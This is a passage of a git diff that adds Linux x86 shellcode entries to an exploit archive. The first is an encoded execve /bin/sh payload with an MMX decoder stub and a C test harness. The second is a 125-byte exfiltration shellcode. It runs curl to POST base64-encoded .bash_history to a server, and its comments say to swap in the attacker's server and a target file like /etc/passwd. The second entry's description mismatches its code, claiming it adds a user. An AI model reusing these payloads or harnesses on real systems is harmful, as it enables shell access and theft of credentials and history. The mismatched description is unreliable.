'\\x'.join('{:02x}'.format(byte) for byte in shuffled_payload)) +print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload)) + +################################################################################ +DECODER +################################################################################ + +global _start + +section .text +_start: + + jmp short call_decoder + +decoder: + + pop edi + xor ecx, ecx + mov cl, [edi] + inc edi + mov esi, edi + +decode: + + movq mm0, qword [edi] + movq mm1, qword [edi +4] + punpcklbw mm0, mm1 + movq qword [edi], mm0 + add edi, 0x8 + loop decode + jmp esi + +call_decoder: + + call decoder + EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80 + +################################################################################ +TESTING +################################################################################ + +#include +#include + +unsigned char code[] = \ +"\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*CodeFun)() = (int(*)())code; + CodeFun(); +} + +################################################################################ + + +Kind Regards +------------------------------ + +Bc. Petr Javorik +www.mmquant.net + maple@mmquant.net \ No newline at end of file diff --git a/shellcodes/linux_x86/46704.txt b/shellcodes/linux_x86/46704.txt new file mode 100644 index 000000000..f0dd531a6 --- /dev/null +++ b/shellcodes/linux_x86/46704.txt @@ -0,0 +1,76 @@ +# Exploit Title: Linux/x86 cat file encode to base64 and post via curl to webserver (125 bytes) +# Google Dork: None +# Date: 11.04.2019 +# Exploit Author: strider +# Vendor Homepage: None +# Software Link: None +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 125 +------------------------------[Description]--------------------------------- + +This shellcode writes a new user to the given passwd file + +Username = sshd +password = root +Shell = sh + +-----------------------------[Shellcode Dump]--------------------------------- +section .text + +global _start + +_start: + xor eax, eax + push eax + jmp short _cmd + +_build: + pop ecx + mov edi, ecx + xor ecx, ecx + push eax + push 0x68732f6e + push 0x69622f2f + +_param: + mov ebx, esp + push eax + push word 0x632d + mov esi, esp + +_exec: + push eax + push edi + push esi + push ebx + + mov ecx, esp + mov al, 11 + int 0x80 + +_cmd: + call _build + msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST", 0x0a + ; decoded url = curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST + ;change url to your server + ; change file to you target file like /etc/passwd + + + -----------------------------[Compile]--------------------------------------------- + gcc -m32 -fno-stack-protector -z execstack -o tester tester.c + + -----------------------------[C-Code]----------------------------- + + #include + #include + + unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30\x20\x2d\x64\x20\x27\x64\x61\x74\x61\x3d\x27\x24\x28\x63\x61\x74\x20\x2e\x62\x61\x73\x68\x5f\x68\x69\x73\x74\x6f\x72\x79\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x77\x20\x30\x29\x20\x2d\x58\x20\x50\x4f\x53\x54\x0a"; + + void main() + { + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + ret(); + } \ No newline at end of file